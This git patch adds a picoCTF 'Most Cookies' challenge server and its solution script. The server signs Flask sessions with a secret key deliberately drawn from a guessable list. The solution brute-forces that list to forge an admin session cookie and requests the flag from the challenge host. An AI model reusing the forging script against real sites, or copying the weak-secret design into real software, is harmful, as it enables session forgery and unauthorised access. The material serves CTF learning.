From 4196849359a311feba4f4ae59be50561810a9602 Mon Sep 17 00:00:00 2001 From: Maxime Vorwerk Date: Thu, 13 Jun 2024 16:18:20 +0200 Subject: [PATCH] most cookies --- most_cookies/server.py | 58 ++++++++++++++++++++++++++++++++++++++++++ most_cookies/sol.py | 22 ++++++++++++++++ 2 files changed, 80 insertions(+) create mode 100755 most_cookies/server.py create mode 100755 most_cookies/sol.py diff --git a/most_cookies/server.py b/most_cookies/server.py new file mode 100755 index 0000000..aff347f --- /dev/null +++ b/most_cookies/server.py @@ -0,0 +1,58 @@ +from flask import Flask, render_template, request, url_for, redirect, make_response, flash, session +import random +app = Flask(__name__) +flag_value = open("./flag").read().rstrip() +title = "Most Cookies" +cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"] +app.secret_key = random.choice(cookie_names) + +@app.route("/") +def main(): + if session.get("very_auth"): + check = session["very_auth"] + if check == "blank": + return render_template("index.html", title=title) + else: + return make_response(redirect("/display")) + else: + resp = make_response(redirect("/")) + session["very_auth"] = "blank" + return resp + +@app.route("/search", methods=["GET", "POST"]) +def search(): + if "name" in request.form and request.form["name"] in cookie_names: + resp = make_response(redirect("/display")) + session["very_auth"] = request.form["name"] + return resp + else: + message = "That doesn't appear to be a valid cookie." + category = "danger" + flash(message, category) + resp = make_response(redirect("/")) + session["very_auth"] = "blank" + return resp + +@app.route("/reset") +def reset(): + resp = make_response(redirect("/")) + session.pop("very_auth", None) + return resp + +@app.route("/display", methods=["GET"]) +def flag(): + if session.get("very_auth"): + check = session["very_auth"] + if check == "admin": + resp = make_response(render_template("flag.html", value=flag_value, title=title)) + return resp + flash("That is a cookie! Not very special though...", "success") + return render_template("not-flag.html", title=title, cookie_name=session["very_auth"]) + else: + resp = make_response(redirect("/")) + session["very_auth"] = "blank" + return resp + +if __name__ == "__main__": + app.run() + diff --git a/most_cookies/sol.py b/most_cookies/sol.py new file mode 100755 index 0000000..bc00810 --- /dev/null +++ b/most_cookies/sol.py @@ -0,0 +1,22 @@ +#!/home/maxime/.pyvenv/bin/python3 +from tqdm import tqdm +import requests +import hashlib +from itsdangerous import URLSafeTimedSerializer, Signer + +key_list = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"] + +cookie_given_b64 = "eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Zmr-Hg.EZmO2K5if1NGsQEXrC2ii1PhJmE" +cookie_base_value = {"very_auth":"admin"} + +for key in tqdm(key_list): + cookie_signature = URLSafeTimedSerializer(key, salt="cookie-session", signer_kwargs={"key_derivation": "hmac", "digest_method": hashlib.sha1}).dumps(cookie_base_value) + tqdm.write(cookie_signature) + cookie = {"session": cookie_signature} + r = requests.get("http://mercury.picoctf.net:53700/display", cookies=cookie, allow_redirects=False) + if "picoCTF{" in r.text: + for line in r.text.splitlines(): + if "picoCTF{" in line: + tqdm.write(line) + exit() +